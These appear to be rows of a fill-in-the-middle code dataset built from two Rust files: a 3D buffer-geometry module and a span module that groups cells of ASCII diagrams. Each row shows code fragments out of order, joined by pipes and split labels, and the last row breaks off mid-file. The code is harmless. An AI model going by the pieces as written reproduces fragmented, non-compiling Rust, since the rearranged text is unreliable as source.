match self {
BufferData::Matrix2(a) => a.len(),
BufferData::Matrix3(a) => a.len(),
BufferData::Matrix4(a) => a.len(),
BufferData::Vector2(a) => a.len(),
BufferData::Vector3(a) => a.len(),
BufferData::Vector4(a) => a.len(),
BufferData::F32(a) => a.len(),
BufferData::I32(a) => a.len(),
BufferData::U32(a) => a.len(),
BufferData::I16(a) => a.len(),
BufferData::U16(a) => a.len(),
BufferData::I8(a) => a.len(),
BufferData::U8(a) => a.len(),
}
}
pub fn elem_byte_len(&self) -> usize {
let bytes = match self {
BufferData::Matrix2(_) => mem::size_of::<f32>(),
BufferData::Matrix3(_) => mem::size_of::<f32>(),
BufferData::Matrix4(_) => mem::size_of::<f32>(),
BufferData::Vector2(_) => mem::size_of::<f32>(),
BufferData::Vector3(_) => mem::size_of::<f32>(),
BufferData::Vector4(_) => mem::size_of::<f32>(),
BufferData::F32(_) => mem::size_of::<f32>(),
BufferData::I32(_) => mem::size_of::<i32>(),
BufferData::U32(_) => mem::size_of::<u32>(),
BufferData::I16(_) => mem::size_of::<i16>(),
BufferData::U16(_) => mem::size_of::<u16>(),
BufferData::I8(_) => mem::size_of::<i8>(),
BufferData::U8(_) => mem::size_of::<u8>(),
};
self.item_size() * bytes
}
pub fn definition(&self) -> String {
match self {
BufferData::Matrix2(_) => "MAT2".to_string(),
BufferData::Matrix3(_) => "MAT3".to_string(),
BufferData::Matrix4(_) => "MAT4".to_string(),
BufferData::Vector2(_) => "VEC2".to_string(),
BufferData::Vector3(_) => "VEC3".to_string(),
BufferData::Vector4(_) => "VEC4".to_string(),
BufferData::F32(_) => "F32".to_string(),
BufferData::I32(_) => "I32".to_string(),
BufferData::U32(_) => "U32".to_string(),
BufferData::I16(_) => "I16".to_string(),
BufferData::U16(_) => "U16".to_string(),
BufferData::I8(_) => "I8".to_string(),
BufferData::U8(_) => "U8".to_string(),
}
}
}
#[derive(Clone, Debug, Eq, PartialEq)]
pub enum BufferType {
Position,
Normal,
Tangent,
UV(usize),
Color(usize),
Joint(usize),
Weight(usize),
Other(String),
}
impl BufferType {
pub fn definition(&self) -> String {
match self {
BufferType::Position => "POSITION".to_string(),
BufferType::Normal => "NORMAL".to_string(),
BufferType::Tangent => "TANGENT".to_string(),
BufferType::UV(n) => format!("UV_{}", n),
BufferType::Color(n) => format!("COLOR_{}", n),
BufferType::Joint(n) => format!("JOINT_{}", n),
BufferType::Weight(n) => format!("WEIGHT_{}", n),
BufferType::Other(string) => string.to_shouty_snake_case(),
}
}
}
#[derive(Clone, Debug)]
pub struct BufferAttribute {
pub data: BufferData,
pub buffer_type: BufferType,
pub dynamic: bool,
pub normalized: bool,
// pub version: usize,
}
impl BufferAttribute {
pub fn count(&self) -> usize {
let l = self.len();
l / self.item_size()
}
pub fn item_size(&self) -> usize {
self.data.item_size()
}
pub fn len(&self) -> usize {
self.data.len()
}
pub fn set_normalized(&mut self, normalized: bool) -> &mut Self {
self.normalized = normalized;
self
}
pub fn set_dynamic(&mut self, dynamic: bool) -> &mut Self {
self.dynamic = dynamic;
self
}
pub fn definition(&self) ->String |
}
#[allow(dead_code)]
#[derive(Hash, Eq, PartialEq, Debug, Clone)]
pub struct BufferGroup {
pub start: usize,
pub material_index: usize,
pub count: usize,
pub name: Option<String>,
}
#[allow(dead_code)]
#[derive(Clone)]
pub struct BufferGeometry {
pub uuid: Uuid,
pub name: String,
pub groups: Vec<BufferGroup>,
pub indices: Vec<u32>,
pub attributes: Vec<BufferAttribute>,
pub buffer_order: Vec<BufferType>,
pub b_box: Option<BBox3<f32>>,
callbacks: Vec<fn(&mut BufferGeometry)>,
}
impl fmt::Debug for BufferGeometry {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "=====================
BufferGeometry: {}
uuid: {}
groups: {:?}
b_box: {:?}
callbacks: {}
indices: {:?}
attributes: {:?}
=====================",
self.name,
self.uuid,
self.groups,
self.b_box,
self.callbacks.len(),
self.indices,
self.attributes,
)
}
}
#[allow(dead_code)]
impl BufferGeometry {
pub fn new() -> Self {
Self {
attributes: Vec::new(),
groups: Vec::new(),
indices: Vec::new(),
uuid: Uuid::new_v4(),
callbacks: Vec::new(),
name: "".to_string(),
b_box: None,
buffer_order: vec![BufferType::Position, BufferType::Normal, BufferType::UV(0), BufferType::Color(0), BufferType::Joint(0), BufferType::Weight(0)],
}
}
pub fn iter_attributes<'a>(&'a self) -> impl Iterator<Item= &'a BufferAttribute> {
self.buffer_order.iter()
.map(move |e| self.get_attribute(e.clone()) )
.filter(|e| e.is_some() )
.map(|e| e.unwrap() )
}
// pub fn iter_attributes_mut<'a>(&'a mut self) -> impl Iterator<Item= &'a mut BufferAttribute> {
// self.buffer_order.iter()
// .map(move |e| self.get_attribute_mut(e.clone()) )
// .filter(|e| e.is_some() )
// .map(|e| e.unwrap() )
// }
pub fn set_indices(&mut self, indices: Vec<u32>) -> &mut Self {
self.indices = indices;
self
}
pub fn gen_indices(&mut self) -> Result<(), &str> {
let mut len = 0;
match self.get_attribute(BufferType::Position) {
None => {
return Err("BufferGeometry: cant find position");
}
Some(positions) => {
len = positions.len();
}
};
let indices = (0..len as u32).collect();
self.set_indices(indices);
Ok(())
}
pub fn add_buffer_attribute(
&mut self,
buffer_attribute: BufferAttribute,
) -> &mut BufferAttribute {
let index = self.attributes.iter().position( |attr| attr.buffer_type == buffer_attribute.buffer_type);
if let Some(index) = index {
self.attributes.remove(index);
}
self.attributes.push(buffer_attribute);
if !self.attributes.iter().all( |e| e.len() == self.attributes[0].len() ) {
panic!("BufferGeometry: different buffer length: {}", self.name);
}
let i = self.attributes.len() - 1;
&mut self.attributes[i]
}
pub fn create_buffer_attribute(
&mut self,
buffer_type: BufferType,
data: BufferData,
) -> &mut BufferAttribute {
let buffer_attribute = BufferAttribute {
buffer_type,
data,
normalized: false,
dynamic: false,
// version: 0,
};
self.add_buffer_attribute(buffer_attribute)
}
pub fn on_drop(&mut self, cb: fn(&mut BufferGeometry)) {
self.callbacks.push(cb);
}
pub fn get_attribute(&self, buffer_type: BufferType) -> Option<&BufferAttribute> {
self.attributes.iter().find(|e| e.buffer_type == buffer_type)
}
pub fn has_attribute(&self, buffer_type: BufferType) -> bool {
self.attributes.iter().any(|e| e.buffer_type == buffer_type)
}
pub fn get_attribute_mut(&mut self, buffer_type: BufferType) -> Option<&mut BufferAttribute> {
self.attributes.iter_mut().find(|e| e.buffer_type == buffer_type)
}
pub fn generate_normals(&mut self) {
let mut normals = None;
{
let attribute = self.get_attribute(BufferType::Position).unwrap();
if let BufferData::Vector3(data) = &attribute.data {
let mut calc_normals = vec![Vec::new(); data.len()];
let indices = &self.indices;
let il = indices.len();
let mut i = 0;
while i < il {
let a = &data[ indices[i] as usize];
let b = &data[ indices[i+1] as usize];
let c = &data[ indices[i+2] as usize];
let mut cb = c - b;
let ab = a - b;
cb.cross(&ab);
cb.normalize();
calc_normals[ indices[i] as usize ].push(cb.clone());
calc_normals[ indices[i+1] as usize ].push(cb.clone());
calc_normals[ indices[i+2] as usize ].push(cb);
i+=3;
}
let calc_normals = calc_normals
.iter()
.map(|items|{
if items.len() == 1 {
return items[0].clone();
}
let mut res = Vector3::add_all_vectors(items);
res.normalize();
res
})
.collect();
normals = Some(calc_normals);
}
}
if let Some(normal) = normals {
self.create_buffer_attribute(BufferType::Normal, BufferData::Vector3(normal));
}
}
pub fn duplicate(&self) -> Self {
let mut data = self.clone();
data.uuid = Uuid::new_v4();
data
}
pub fn update_box3 (&mut self) -> Result <(), Box<Error>> {
let mut b_box = None;
if let Some(attr) = self.get_attribute(BufferType::Position) {
if let BufferData::Vector3(positions) = &attr.data {
let mut b = BBox3::new_empty();
b.set_from_array(&positions[..]);
b_box = Some(b);
}
}
if b_box.is_none() {return Err( Box::from("cant update b_box") ); }
self.b_box = b_box;
Ok(())
}
pub fn get_b_box(&mut self) -> Result<BBox3<f32>, Box<Error>> {
if self.b_box.is_some() {
return Ok(self.b_box.as_ref().unwrap().clone())
}
self.update_box3()?;
Ok(self.b_box.as_ref().unwrap().clone())
}
pub fn scale_positions_by_vec(&mut self, v: &Vector3<f32>) -> Option<()> {
if let Some(attr) = self.get_attribute_mut(BufferType::Position) {
if let BufferData::Vector3(positions) = &mut attr.data {
positions
.iter_mut()
.for_each(|e| {
e.multiply(v);
});
return Some(());
}
return None;
}
None
}
pub fn get_vertex_byte_size(&self) -> usize {
self.iter_attributes().map(|attr| attr.data.elem_byte_len()).sum()
}
}
impl Drop for BufferGeometry {
fn drop(&mut self) {
while self.callbacks.len() > 0 {
let cb = self.callbacks.pop().unwrap();
cb(self);
}
}
}
#[derive(Clone)]
pub struct SharedGeometry (Arc<Mutex<BufferGeometry>>);
impl SharedGeometry {
pub fn new(g: BufferGeometry) -> Self {
SharedGeometry(Arc::new(Mutex::new(g)))
}
pub fn lock(&mut self) -> LockResult<MutexGuard<BufferGeometry>> {
self.0.lock()
}
}
impl Component for SharedGeometry {
type Storage = VecStorage<Self>;
}
| {
format!("VERTEX_{}_{}", self.buffer_type.definition(), self.data.definition())
} | identifier_body |
buffer_geometry.rs | extern crate uuid;
extern crate heck;
extern crate specs;
use self::uuid::Uuid;
use self::heck::ShoutySnakeCase;
use std::vec::Vec;
use std::fmt;
use std::sync::{Arc,Mutex, LockResult, MutexGuard};
use std::mem;
use std::error::Error;
use self::specs::{Component, VecStorage};
use math::{
Vector,
Vector2,
Vector3,
Vector4,
Matrix2,
Matrix3,
Matrix4,
};
use core::{
BBox3,
};
#[allow(dead_code)]
#[derive(Clone, Debug)]
pub enum BufferData {
Matrix2(Vec<Matrix2<f32>>),
Matrix3(Vec<Matrix3<f32>>),
Matrix4(Vec<Matrix4<f32>>),
Vector2(Vec<Vector2<f32>>),
Vector3(Vec<Vector3<f32>>),
Vector4(Vec<Vector4<f32>>),
F32(Vec<f32>),
I32(Vec<i32>),
U32(Vec<u32>),
I16(Vec<i16>),
U16(Vec<u16>),
I8(Vec<i8>),
U8(Vec<u8>),
}
impl BufferData {
pub fn item_size(&self) -> usize {
match self {
BufferData::Matrix2(_) => 4,
BufferData::Matrix3(_) => 9,
BufferData::Matrix4(_) => 16,
BufferData::Vector2(_) => 2,
BufferData::Vector3(_) => 3,
BufferData::Vector4(_) => 4,
BufferData::F32(_) => 1,
BufferData::I32(_) => 1,
BufferData::U32(_) => 1,
BufferData::I16(_) => 1,
BufferData::U16(_) => 1,
BufferData::I8(_) => 1,
BufferData::U8(_) => 1,
}
}
pub fn len(&self) -> usize {
match self {
BufferData::Matrix2(a) => a.len(),
BufferData::Matrix3(a) => a.len(),
BufferData::Matrix4(a) => a.len(),
BufferData::Vector2(a) => a.len(),
BufferData::Vector3(a) => a.len(),
BufferData::Vector4(a) => a.len(),
BufferData::F32(a) => a.len(),
BufferData::I32(a) => a.len(),
BufferData::U32(a) => a.len(),
BufferData::I16(a) => a.len(),
BufferData::U16(a) => a.len(),
BufferData::I8(a) => a.len(),
BufferData::U8(a) => a.len(),
}
}
pub fn elem_byte_len(&self) -> usize {
let bytes = match self {
BufferData::Matrix2(_) => mem::size_of::<f32>(),
BufferData::Matrix3(_) => mem::size_of::<f32>(),
BufferData::Matrix4(_) => mem::size_of::<f32>(),
BufferData::Vector2(_) => mem::size_of::<f32>(),
BufferData::Vector3(_) => mem::size_of::<f32>(),
BufferData::Vector4(_) => mem::size_of::<f32>(),
BufferData::F32(_) => mem::size_of::<f32>(),
BufferData::I32(_) => mem::size_of::<i32>(),
BufferData::U32(_) => mem::size_of::<u32>(),
BufferData::I16(_) => mem::size_of::<i16>(),
BufferData::U16(_) => mem::size_of::<u16>(),
BufferData::I8(_) => mem::size_of::<i8>(),
BufferData::U8(_) => mem::size_of::<u8>(),
};
self.item_size() * bytes
}
pub fn definition(&self) -> String {
match self {
BufferData::Matrix2(_) => "MAT2".to_string(),
BufferData::Matrix3(_) => "MAT3".to_string(),
BufferData::Matrix4(_) => "MAT4".to_string(),
BufferData::Vector2(_) => "VEC2".to_string(),
BufferData::Vector3(_) => "VEC3".to_string(),
BufferData::Vector4(_) => "VEC4".to_string(),
BufferData::F32(_) => "F32".to_string(),
BufferData::I32(_) => "I32".to_string(),
BufferData::U32(_) => "U32".to_string(),
BufferData::I16(_) => "I16".to_string(),
BufferData::U16(_) => "U16".to_string(),
BufferData::I8(_) => "I8".to_string(),
BufferData::U8(_) => "U8".to_string(),
} |
#[derive(Clone, Debug, Eq, PartialEq)]
pub enum BufferType {
Position,
Normal,
Tangent,
UV(usize),
Color(usize),
Joint(usize),
Weight(usize),
Other(String),
}
impl BufferType {
pub fn definition(&self) -> String {
match self {
BufferType::Position => "POSITION".to_string(),
BufferType::Normal => "NORMAL".to_string(),
BufferType::Tangent => "TANGENT".to_string(),
BufferType::UV(n) => format!("UV_{}", n),
BufferType::Color(n) => format!("COLOR_{}", n),
BufferType::Joint(n) => format!("JOINT_{}", n),
BufferType::Weight(n) => format!("WEIGHT_{}", n),
BufferType::Other(string) => string.to_shouty_snake_case(),
}
}
}
#[derive(Clone, Debug)]
pub struct BufferAttribute {
pub data: BufferData,
pub buffer_type: BufferType,
pub dynamic: bool,
pub normalized: bool,
// pub version: usize,
}
impl BufferAttribute {
pub fn count(&self) -> usize {
let l = self.len();
l / self.item_size()
}
pub fn item_size(&self) -> usize {
self.data.item_size()
}
pub fn len(&self) -> usize {
self.data.len()
}
pub fn set_normalized(&mut self, normalized: bool) -> &mut Self {
self.normalized = normalized;
self
}
pub fn set_dynamic(&mut self, dynamic: bool) -> &mut Self {
self.dynamic = dynamic;
self
}
pub fn definition(&self) ->String {
format!("VERTEX_{}_{}", self.buffer_type.definition(), self.data.definition())
}
}
#[allow(dead_code)]
#[derive(Hash, Eq, PartialEq, Debug, Clone)]
pub struct BufferGroup {
pub start: usize,
pub material_index: usize,
pub count: usize,
pub name: Option<String>,
}
#[allow(dead_code)]
#[derive(Clone)]
pub struct BufferGeometry {
pub uuid: Uuid,
pub name: String,
pub groups: Vec<BufferGroup>,
pub indices: Vec<u32>,
pub attributes: Vec<BufferAttribute>,
pub buffer_order: Vec<BufferType>,
pub b_box: Option<BBox3<f32>>,
callbacks: Vec<fn(&mut BufferGeometry)>,
}
impl fmt::Debug for BufferGeometry {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "=====================
BufferGeometry: {}
uuid: {}
groups: {:?}
b_box: {:?}
callbacks: {}
indices: {:?}
attributes: {:?}
=====================",
self.name,
self.uuid,
self.groups,
self.b_box,
self.callbacks.len(),
self.indices,
self.attributes,
)
}
}
#[allow(dead_code)]
impl BufferGeometry {
pub fn new() -> Self {
Self {
attributes: Vec::new(),
groups: Vec::new(),
indices: Vec::new(),
uuid: Uuid::new_v4(),
callbacks: Vec::new(),
name: "".to_string(),
b_box: None,
buffer_order: vec![BufferType::Position, BufferType::Normal, BufferType::UV(0), BufferType::Color(0), BufferType::Joint(0), BufferType::Weight(0)],
}
}
pub fn iter_attributes<'a>(&'a self) -> impl Iterator<Item= &'a BufferAttribute> {
self.buffer_order.iter()
.map(move |e| self.get_attribute(e.clone()) )
.filter(|e| e.is_some() )
.map(|e| e.unwrap() )
}
// pub fn iter_attributes_mut<'a>(&'a mut self) -> impl Iterator<Item= &'a mut BufferAttribute> {
// self.buffer_order.iter()
// .map(move |e| self.get_attribute_mut(e.clone()) )
// .filter(|e| e.is_some() )
// .map(|e| e.unwrap() )
// }
pub fn set_indices(&mut self, indices: Vec<u32>) -> &mut Self {
self.indices = indices;
self
}
pub fn gen_indices(&mut self) -> Result<(), &str> {
let mut len = 0;
match self.get_attribute(BufferType::Position) {
None => {
return Err("BufferGeometry: cant find position");
}
Some(positions) => {
len = positions.len();
}
};
let indices = (0..len as u32).collect();
self.set_indices(indices);
Ok(())
}
pub fn add_buffer_attribute(
&mut self,
buffer_attribute: BufferAttribute,
) -> &mut BufferAttribute {
let index = self.attributes.iter().position( |attr| attr.buffer_type == buffer_attribute.buffer_type);
if let Some(index) = index {
self.attributes.remove(index);
}
self.attributes.push(buffer_attribute);
if !self.attributes.iter().all( |e| e.len() == self.attributes[0].len() ) {
panic!("BufferGeometry: different buffer length: {}", self.name);
}
let i = self.attributes.len() - 1;
&mut self.attributes[i]
}
pub fn create_buffer_attribute(
&mut self,
buffer_type: BufferType,
data: BufferData,
) -> &mut BufferAttribute {
let buffer_attribute = BufferAttribute {
buffer_type,
data,
normalized: false,
dynamic: false,
// version: 0,
};
self.add_buffer_attribute(buffer_attribute)
}
pub fn on_drop(&mut self, cb: fn(&mut BufferGeometry)) {
self.callbacks.push(cb);
}
pub fn get_attribute(&self, buffer_type: BufferType) -> Option<&BufferAttribute> {
self.attributes.iter().find(|e| e.buffer_type == buffer_type)
}
pub fn has_attribute(&self, buffer_type: BufferType) -> bool {
self.attributes.iter().any(|e| e.buffer_type == buffer_type)
}
pub fn get_attribute_mut(&mut self, buffer_type: BufferType) -> Option<&mut BufferAttribute> {
self.attributes.iter_mut().find(|e| e.buffer_type == buffer_type)
}
pub fn generate_normals(&mut self) {
let mut normals = None;
{
let attribute = self.get_attribute(BufferType::Position).unwrap();
if let BufferData::Vector3(data) = &attribute.data {
let mut calc_normals = vec![Vec::new(); data.len()];
let indices = &self.indices;
let il = indices.len();
let mut i = 0;
while i < il {
let a = &data[ indices[i] as usize];
let b = &data[ indices[i+1] as usize];
let c = &data[ indices[i+2] as usize];
let mut cb = c - b;
let ab = a - b;
cb.cross(&ab);
cb.normalize();
calc_normals[ indices[i] as usize ].push(cb.clone());
calc_normals[ indices[i+1] as usize ].push(cb.clone());
calc_normals[ indices[i+2] as usize ].push(cb);
i+=3;
}
let calc_normals = calc_normals
.iter()
.map(|items|{
if items.len() == 1 {
return items[0].clone();
}
let mut res = Vector3::add_all_vectors(items);
res.normalize();
res
})
.collect();
normals = Some(calc_normals);
}
}
if let Some(normal) = normals {
self.create_buffer_attribute(BufferType::Normal, BufferData::Vector3(normal));
}
}
pub fn duplicate(&self) -> Self {
let mut data = self.clone();
data.uuid = Uuid::new_v4();
data
}
pub fn update_box3 (&mut self) -> Result <(), Box<Error>> {
let mut b_box = None;
if let Some(attr) = self.get_attribute(BufferType::Position) {
if let BufferData::Vector3(positions) = &attr.data {
let mut b = BBox3::new_empty();
b.set_from_array(&positions[..]);
b_box = Some(b);
}
}
if b_box.is_none() {return Err( Box::from("cant update b_box") ); }
self.b_box = b_box;
Ok(())
}
pub fn get_b_box(&mut self) -> Result<BBox3<f32>, Box<Error>> {
if self.b_box.is_some() {
return Ok(self.b_box.as_ref().unwrap().clone())
}
self.update_box3()?;
Ok(self.b_box.as_ref().unwrap().clone())
}
pub fn scale_positions_by_vec(&mut self, v: &Vector3<f32>) -> Option<()> {
if let Some(attr) = self.get_attribute_mut(BufferType::Position) {
if let BufferData::Vector3(positions) = &mut attr.data {
positions
.iter_mut()
.for_each(|e| {
e.multiply(v);
});
return Some(());
}
return None;
}
None
}
pub fn get_vertex_byte_size(&self) -> usize {
self.iter_attributes().map(|attr| attr.data.elem_byte_len()).sum()
}
}
impl Drop for BufferGeometry {
fn drop(&mut self) {
while self.callbacks.len() > 0 {
let cb = self.callbacks.pop().unwrap();
cb(self);
}
}
}
#[derive(Clone)]
pub struct SharedGeometry (Arc<Mutex<BufferGeometry>>);
impl SharedGeometry {
pub fn new(g: BufferGeometry) -> Self {
SharedGeometry(Arc::new(Mutex::new(g)))
}
pub fn lock(&mut self) -> LockResult<MutexGuard<BufferGeometry>> {
self.0.lock()
}
}
impl Component for SharedGeometry {
type Storage = VecStorage<Self>;
} | }
} | random_line_split |
span.rs | use crate::{
buffer::{
cell_buffer::{Contacts, Endorse},
fragment_buffer::FragmentSpan,
FragmentBuffer, Property, PropertyBuffer, StringBuffer,
},
fragment,
fragment::Circle,
map::{circle_map, UNICODE_FRAGMENTS},
Cell, Fragment, Merge, Point, Settings,
};
use itertools::Itertools;
use std::{
fmt,
ops::{Deref, DerefMut},
};
/// A describes where a char came from relative to the source ascii text
/// The primary purpose of span is to group adjacent cell together
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Span(pub Vec<(Cell, char)>);
impl Deref for Span {
type Target = Vec<(Cell, char)>;
fn deref(&self) -> &Self::Target {
&self.0
}
}
pub struct Bounds {
top_left: Cell,
bottom_right: Cell,
}
impl DerefMut for Span {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl From<Vec<(Cell, char)>> for Span {
fn from(cell_chars: Vec<(Cell, char)>) -> Self {
Span(cell_chars)
}
}
impl Span {
pub(crate) fn new(cell: Cell, ch: char) -> Self {
Span(vec![(cell, ch)])
}
pub(super) fn is_adjacent(&self, cell: &Cell) -> bool {
self.iter()
.rev()
.any(|(ex_cell, _)| ex_cell.is_adjacent(cell))
}
/// if any cell of this span is adjacent to any cell of the other
/// Use .rev() to check the last cell of this Span against the first cell of the other Span
/// They have a high change of matching faster
pub(super) fn can_merge(&self, other: &Self) -> bool {
self.iter().rev().any(|(cell, _)| {
other
.iter()
.any(|(other_cell, _)| cell.is_adjacent(other_cell))
})
}
/// paste the other Span at cell location `loc`
pub fn paste_at(&self, loc: Cell, other: &Self) -> Self {
let mut this = self.clone();
for (cell, ch) in other.deref() {
this.push((*cell + loc, *ch));
}
this.sort();
this.dedup();
this
}
fn top_left(&self) -> Cell {
let bounds = self.bounds().expect("must have bounds");
bounds.0
}
pub fn localize_point(&self, point: Point) -> Point {
self.top_left().localize_point(point)
}
/// returns the top_left most cell which aligns the top most and the left most cell.
pub(crate) fn bounds(&self) -> Option<(Cell, Cell)> {
if let Some((min_y, max_y)) =
self.iter().map(|(cell, _)| cell.y).minmax().into_option()
{
if let Some((min_x, max_x)) =
self.iter().map(|(cell, _)| cell.x).minmax().into_option()
{
Some((Cell::new(min_x, min_y), Cell::new(max_x, max_y)))
} else {
None
}
} else {
None
}
}
pub fn cell_bounds(&self) -> Option<Bounds> {
if let Some((top_left, top_right)) = self.bounds() {
Some(Bounds::new(top_left, top_right))
} else {
None
}
}
/// shift the cells relative to the top_left most bound
pub(crate) fn localize(self) -> Self {
if let Some((tl, _br)) = self.bounds() {
let mut new_self = Span(vec![]);
for (cell, ch) in self.iter() {
let local_cell = tl.localize_cell(*cell);
new_self.push((local_cell, *ch));
}
new_self
} else {
self
}
}
/// convert this span into fragments applying endorsement
/// of group into fragments
///
///
/// TODO: return the rejects as Span, instead of Contacts
pub(crate) fn endorse(self) -> Endorse<FragmentSpan, Span> {
// try to endorse as circles or arcs
let (mut accepted, un_endorsed_span): (Vec<FragmentSpan>, Span) =
self.endorse_to_arcs_and_circles();
// convert into contacts and try to endorse as rects fragments
let un_endorsed_contacts: Vec<Contacts> = un_endorsed_span.into();
let rect_endorsed: Endorse<FragmentSpan, Contacts> =
Contacts::endorse_rects(un_endorsed_contacts);
accepted.extend(rect_endorsed.accepted);
let re_endorsed = Self::re_endorse(rect_endorsed.rejects);
let mut endorsed = Endorse {
accepted,
rejects: vec![],
};
endorsed.extend(re_endorsed);
endorsed
}
/// re try endorsing the contacts into arc and circles by converting it to span first
fn re_endorse(rect_rejects: Vec<Contacts>) -> Endorse<FragmentSpan, Span> {
// convert back to span
let span_rejects: Vec<Span> = rect_rejects
.into_iter()
.map(|contact| contact.span())
.collect();
let span_rejects: Vec<Span> = Span::merge_recursive(span_rejects);
// try to endorse as circles or arcs one more time
let (accepted, rejects): (Vec<Vec<FragmentSpan>>, Vec<Span>) =
span_rejects
.into_iter()
.map(|span| span.endorse_to_arcs_and_circles())
.unzip();
Endorse {
accepted: accepted.into_iter().flatten().collect(),
rejects,
}
}
/// endorse this span into circles, half_circle, quarter_circle only
fn endorse_to_arcs_and_circles(self) -> (Vec<FragmentSpan>, Span) {
let mut accepted = vec![];
let (top_left, _) = self.bounds().expect("must have bounds");
let un_endorsed_span: Span = if let Some((circle, un_endorsed_span)) =
circle_map::endorse_circle_span(&self)
{
let circle = circle.absolute_position(top_left);
let circle_frag_span =
FragmentSpan::new(self.clone(), circle.into());
accepted.push(circle_frag_span);
un_endorsed_span
} else if let Some((three_quarters_arc, un_endorsed_span)) =
circle_map::endorse_three_quarters_arc_span(&self)
{
let three_quarters_arc =
three_quarters_arc.absolute_position(top_left);
let three_quarters_arc_frag_span =
FragmentSpan::new(self.clone(), three_quarters_arc.into());
accepted.push(three_quarters_arc_frag_span);
un_endorsed_span
} else if let Some((half_arc, un_endorsed_span)) =
circle_map::endorse_half_arc_span(&self)
{
let half_arc = half_arc.absolute_position(top_left);
let half_arc_frag_span =
FragmentSpan::new(self.clone(), half_arc.into());
accepted.push(half_arc_frag_span);
un_endorsed_span
} else if let Some((arc, un_endorsed_span)) =
circle_map::endorse_quarter_arc_span(&self)
{
let arc = arc.absolute_position(top_left);
let arc_frag_span = FragmentSpan::new(self.clone(), arc.into());
accepted.push(arc_frag_span);
un_endorsed_span
} else {
self
};
(accepted, un_endorsed_span)
}
/// create a span of the cells that is inside of the start and end bound cells
pub(crate) fn extract(&self, bound1: Cell, bound2: Cell) -> Self {
Span(
self.iter()
.map(|(cell, ch)| (*cell, *ch))
.filter(|(cell, _ch)| cell.is_bounded(bound1, bound2))
.collect(),
)
}
/// returns true if any cell on this span
/// is within the bounds of `bound1` and `bound2`
pub fn is_bounded(&self, bound1: Cell, bound2: Cell) -> bool {
self.iter()
.all(|(cell, ch)| cell.is_bounded(bound1, bound2))
}
pub fn hit_cell(&self, needle: Cell) -> bool |
/// merge as is without checking it it can
pub fn merge_no_check(&self, other: &Self) -> Self {
let mut cells = self.0.clone();
cells.extend(&other.0);
Span(cells)
}
}
impl Merge for Span {
fn merge(&self, other: &Self) -> Option<Self> {
if self.can_merge(other) {
Some(self.merge_no_check(other))
} else {
None
}
}
}
impl Bounds {
pub fn new(cell1: Cell, cell2: Cell) -> Self {
let (top_left, bottom_right) = Cell::rearrange_bound(cell1, cell2);
Self {
top_left,
bottom_right,
}
}
pub fn top_left(&self) -> Cell {
self.top_left
}
pub fn bottom_right(&self) -> Cell {
self.bottom_right
}
pub fn top_right(&self) -> Cell {
Cell::new(self.bottom_right.x, self.top_left.y)
}
pub fn bottom_left(&self) -> Cell {
Cell::new(self.top_left.x, self.bottom_right.y)
}
}
/// create a property buffer for all the cells of this span
impl<'p> From<Span> for PropertyBuffer<'p> {
fn from(span: Span) -> Self {
let mut pb = PropertyBuffer::new();
for (cell, ch) in span.iter() {
if let Some(property) = Property::from_char(*ch) {
pb.as_mut().insert(*cell, property);
}
}
pb
}
}
/// Grouping cell by adjacents are not enough
///
/// grouping them together when they are actually connected
/// is the most approprivate way of grouping
/// Span just provides an optimization of the number
/// of elements to be checked.
/// Only elements on the same span are checked to see if they
/// belong on the same group
///
impl From<Span> for Vec<Contacts> {
fn from(span: Span) -> Vec<Contacts> {
let fb = FragmentBuffer::from(span);
let merged_fragments: Vec<FragmentSpan> = fb.merge_fragment_spans();
let contacts: Vec<Contacts> = merged_fragments
.into_iter()
.map(|frag| Contacts::new(frag))
.collect();
Contacts::merge_recursive(contacts)
}
}
/// First we crate a property buffer based on the cell,char content of this span
/// and then based on the property, we extract the accurate fragments
///
/// If a character has no property, try to see if has equivalent fragments from unicode_map
/// otherwise add it to the fragment_buffer as a text fragment
impl From<Span> for FragmentBuffer {
fn from(span: Span) -> FragmentBuffer {
let pb = PropertyBuffer::from(span.clone());
let mut fb = FragmentBuffer::from(pb.clone());
for (cell, ch) in span.iter() {
if pb.as_ref().get(cell).is_none() {
if let Some(fragments) = UNICODE_FRAGMENTS.get(ch) {
fb.add_fragments_to_cell(*cell, *ch, fragments.clone());
} else {
fb.add_fragment_to_cell(
*cell,
*ch,
fragment::cell_text(*ch),
);
}
}
}
fb
}
}
impl fmt::Display for Span {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
let mut buffer = StringBuffer::new();
if let Some((tl, _br)) = self.bounds() {
for (cell, ch) in self.iter() {
if *ch != '\0' && !ch.is_whitespace() {
let local = tl.localize_cell(*cell);
buffer.add_char(local.x, local.y, *ch);
}
}
}
write!(f, "{}", buffer.to_string())
}
}
#[cfg(test)]
mod test_span;
| {
self.iter().any(|(cell, ch)| *cell == needle)
} | identifier_body |
span.rs | use crate::{
buffer::{
cell_buffer::{Contacts, Endorse},
fragment_buffer::FragmentSpan,
FragmentBuffer, Property, PropertyBuffer, StringBuffer,
},
fragment,
fragment::Circle,
map::{circle_map, UNICODE_FRAGMENTS},
Cell, Fragment, Merge, Point, Settings,
};
use itertools::Itertools;
use std::{
fmt,
ops::{Deref, DerefMut},
};
/// A describes where a char came from relative to the source ascii text
/// The primary purpose of span is to group adjacent cell together
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Span(pub Vec<(Cell, char)>);
impl Deref for Span {
type Target = Vec<(Cell, char)>;
fn deref(&self) -> &Self::Target {
&self.0
}
}
pub struct Bounds {
top_left: Cell,
bottom_right: Cell,
}
impl DerefMut for Span {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl From<Vec<(Cell, char)>> for Span {
fn from(cell_chars: Vec<(Cell, char)>) -> Self {
Span(cell_chars)
}
}
impl Span {
pub(crate) fn new(cell: Cell, ch: char) -> Self {
Span(vec![(cell, ch)])
}
pub(super) fn is_adjacent(&self, cell: &Cell) -> bool {
self.iter()
.rev()
.any(|(ex_cell, _)| ex_cell.is_adjacent(cell))
}
/// if any cell of this span is adjacent to any cell of the other
/// Use .rev() to check the last cell of this Span against the first cell of the other Span
/// They have a high change of matching faster
pub(super) fn can_merge(&self, other: &Self) -> bool {
self.iter().rev().any(|(cell, _)| {
other
.iter()
.any(|(other_cell, _)| cell.is_adjacent(other_cell))
})
}
/// paste the other Span at cell location `loc`
